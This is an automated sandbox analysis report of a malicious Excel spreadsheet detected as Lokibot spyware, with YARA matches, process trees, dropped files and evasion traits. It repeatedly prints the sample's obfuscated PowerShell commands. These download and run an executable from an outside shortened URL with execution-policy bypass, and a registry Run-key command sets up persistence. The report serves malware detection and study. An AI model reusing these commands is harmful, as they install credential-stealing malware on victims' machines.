                Source: 0000000B.00000002.2181861219.0000000004169000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0000000B.00000002.2181751190.0000000004101000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0000000F.00000002.2194844744.0000000003CF1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0000000F.00000002.2194860595.0000000003D0B000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000012.00000002.2213485795.0000000003D59000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000013.00000002.2208511718.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000013.00000002.2208511718.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 17.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 17.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 17.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 17.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 19.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
                Source: 19.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 19.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 19.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 19.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: ntrwe.exe.11.dr, i5Y/Wm2.csCryptographic APIs: 'CreateDecryptor'
                Source: ntrwe.exe.11.dr, Fe1/Fy1.csCryptographic APIs: 'TransformFinalBlock'
                Source: 11.0.12.exe.12a0000.0.unpack, Fe1/Fy1.csCryptographic APIs: 'TransformFinalBlock'
                Source: 11.0.12.exe.12a0000.0.unpack, i5Y/Wm2.csCryptographic APIs: 'CreateDecryptor'
                Source: 11.2.12.exe.12a0000.3.unpack, i5Y/Wm2.csCryptographic APIs: 'CreateDecryptor'
                Source: 11.2.12.exe.12a0000.3.unpack, Fe1/Fy1.csCryptographic APIs: 'TransformFinalBlock'
                Source: 15.0.ntrwe.exe.e90000.0.unpack, i5Y/Wm2.csCryptographic APIs: 'CreateDecryptor'
                Source: 15.0.ntrwe.exe.e90000.0.unpack, Fe1/Fy1.csCryptographic APIs: 'TransformFinalBlock'
                Source: 15.2.ntrwe.exe.e90000.4.unpack, i5Y/Wm2.csCryptographic APIs: 'CreateDecryptor'
                Source: 15.2.ntrwe.exe.e90000.4.unpack, Fe1/Fy1.csCryptographic APIs: 'TransformFinalBlock'
                Source: 16.0.ntrwe.exe.e90000.0.unpack, i5Y/Wm2.csCryptographic APIs: 'CreateDecryptor'
                Source: powershell.exe, 00000006.00000002.2103852429.000000001CD80000.00000002.00000001.sdmp, 12.exe, 0000000B.00000002.2187386267.0000000008780000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
                Source: classification engineClassification label: mal100.spyw.expl.evad.winXLS@27/18@2/3
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 17_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,17_2_0040650A
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 17_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,17_2_0040434D
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\B5DE0000Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\DE4229FCF97F5879F50F8FD3
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRCF6F.tmpJump to behavior
                Source: 6Cprm97UTl.xlsOLE indicator, Workbook stream: true
                Source: C:\Windows\SysWOW64\reg.exeConsole Write: ................................T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.........X.......N.......p...............Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\12.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
                Source: C:\Users\user\ntrwe.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
                Source: C:\Users\user\ntrwe.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
                Source: C:\Users\user\ntrwe.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/qjdJoz4','12.exe')
                Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item '12.exe' -Destination '${enV`:temp}'
                Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12.exe')
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/qjdJoz4','12.exe')
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item '12.exe' -Destination '${enV`:temp}'
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12.exe')
                Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\12.exe C:\Users\user\AppData\Local\Temp\12.exe
                Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe 'cmd.exe' /c REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run' /f /v 'jfdts' /t REG_SZ /d 'C:\Users\user\ntrwe.exe'
                Source: unknownProcess created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run' /f /v 'jfdts' /t REG_SZ /d 'C:\Users\user\ntrwe.exe'
                Source: unknownProcess created: C:\Users\user\ntrwe.exe 'C:\Users\user\ntrwe.exe'
                Source: unknownProcess created: C:\Users\user\ntrwe.exe 'C:\Users\user\ntrwe.exe'
                Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\RegAsm.exe C:\Users\user\AppData\Local\Temp\RegAsm.exe
                Source: unknownProcess created: C:\Users\user\ntrwe.exe 'C:\Users\user\ntrwe.exe'
                Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\RegAsm.exe C:\Users\user\AppData\Local\Temp\RegAsm.exe
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/qjdJoz4','12.exe')Jump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item '12.exe' -Destination '${enV`:temp}'Jump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12.exe')Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/qjdJoz4','12.exe')Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item '12.exe' -Destination '${enV`:temp}'Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12.exe')Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\12.exe C:\Users\user\AppData\Local\Temp\12.exeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'cmd.exe' /c REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run' /f /v 'jfdts' /t REG_SZ /d 'C:\Users\user\ntrwe.exe'Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess created: C:\Users\user\ntrwe.exe 'C:\Users\user\ntrwe.exe' Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run' /f /v 'jfdts' /t REG_SZ /d 'C:\Users\user\ntrwe.exe'Jump to behavior
                Source: C:\Users\user\ntrwe.exeProcess created: C:\Users\user\AppData\Local\Temp\RegAsm.exe C:\Users\user\AppData\Local\Temp\RegAsm.exeJump to behavior
                Source: C:\Users\user\ntrwe.exeProcess created: C:\Users\user\AppData\Local\Temp\RegAsm.exe C:\Users\user\AppData\Local\Temp\RegAsm.exe
                Source: C:\Users\user\AppData\Local\Temp\12.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dllJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                Source: Binary string: RegAsm.pdb source: RegAsm.exe
                Source: Binary string: mscorrc.pdb source: powershell.exe, 00000006.00000002.2099102007.0000000002720000.00000002.00000001.sdmp, powershell.exe, 00000008.00000002.2140184576.000000001B940000.00000002.00000001.sdmp, powershell.exe, 00000009.00000002.2158358112.000000001B8A0000.00000002.00000001.sdmp

                Data Obfuscation:

                barindex
                Obfuscated command line foundShow sources
                Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/qjdJoz4','12.exe')
                Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/qjdJoz4','12.exe')
                Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item '12.exe' -Destination '${enV`:temp}'
                Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item '12.exe' -Destination '${enV`:temp}'
                Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item '12.exe' -Destination '${enV`:temp}'
                Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12.exe')
                Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12.exe')
                Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12.exe')
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/qjdJoz4','12.exe')
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item '12.exe' -Destination '${enV`:temp}'
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item '12.exe' -Destination '${enV`:temp}'
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12.exe')
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12.exe')
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/qjdJoz4','12.exe')Jump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/qjdJoz4','12.exe')Jump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item '12.exe' -Destination '${enV`:temp}'Jump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item '12.exe' -Destination '${enV`:temp}'Jump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item '12.exe' -Destination '${enV`:temp}'Jump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12.exe')Jump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12.exe')Jump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12.exe')Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/qjdJoz4','12.exe')Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item '12.exe' -Destination '${enV`:temp}'Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item '12.exe' -Destination '${enV`:temp}'Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12.exe')Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12.exe')Jump to behavior
                Yara detected aPLib compressed binaryShow sources
                Source: Yara matchFile source: 0000000F.00000002.2194899454.0000000003D59000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.2181372307.00000000040CD000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.2194803649.0000000003CBD000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.2213431587.0000000003CF1000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.2212693514.0000000002790000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.2194883394.0000000003D3F000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.2213384290.0000000003CBD000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.2213452314.0000000003D0B000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.2213472587.0000000003D3F000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.2181768708.000000000411B000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.2181829102.000000000414F000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.2181861219.0000000004169000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.2181751190.0000000004101000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.2194844744.0000000003CF1000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.2194860595.0000000003D0B000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.2213485795.0000000003D59000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.2193389507.0000000002792000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000013.00000002.2208511718.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 12.exe PID: 2800, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2192, type: MEMORY
                Source: Yara matchFile source: 17.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 19.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 19.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: C:\Users\user\AppData\Local\Temp\12.exeCode function: 11_2_012A5456 push ss; retf 11_2_012A5459
                Source: C:\Users\user\AppData\Local\Temp\12.exeCode function: 11_2_0031AB04 pushad ; ret 11_2_0031AB2D
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_00E95456 push ss; retf 15_2_00E95459
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_005013F1 push edx; retf 15_2_00501403
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 17_2_0025523F push cs; iretd 17_2_00255240
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 17_2_00402AC0 push eax; ret 17_2_00402AD4
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 17_2_00402AC0 push eax; ret 17_2_00402AFC
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 19_2_0123523F push cs; iretd 19_2_01235240

                Persistence and Installation Behavior:

                barindex
                Drops PE files to the document folder of the userShow sources
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\12.exeJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\12.exeJump to dropped file
                Source: C:\Users\user\ntrwe.exeFile created: C:\Users\user\AppData\Local\Temp\RegAsm.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\12.exeFile created: C:\Users\user\ntrwe.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\12.exeFile created: C:\Users\user\ntrwe.exeJump to dropped file

                Boot Survival:

                barindex
                Drops PE files to the user root directoryShow sources
                Source: C:\Users\user\AppData\Local\Temp\12.exeFile created: C:\Users\user\ntrwe.exeJump to dropped file
                Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run jfdtsJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run jfdtsJump to behavior

                Hooking and other Techniques for Hiding and Protection:

                barindex
                Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                Source: C:\Users\user\AppData\Local\Temp\12.exeFile opened: C:\Users\user\AppData\Local\Temp\12.exe\:Zone.Identifier read attributes | deleteJump to behavior
                Source: C:\Users\user\ntrwe.exeFile opened: C:\Users\user\ntrwe.exe\:Zone.Identifier read attributes | deleteJump to behavior
                Source: C:\Users\user\ntrwe.exeFile opened: C:\Users\user\ntrwe.exe\:Zone.Identifier read attributes | delete
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
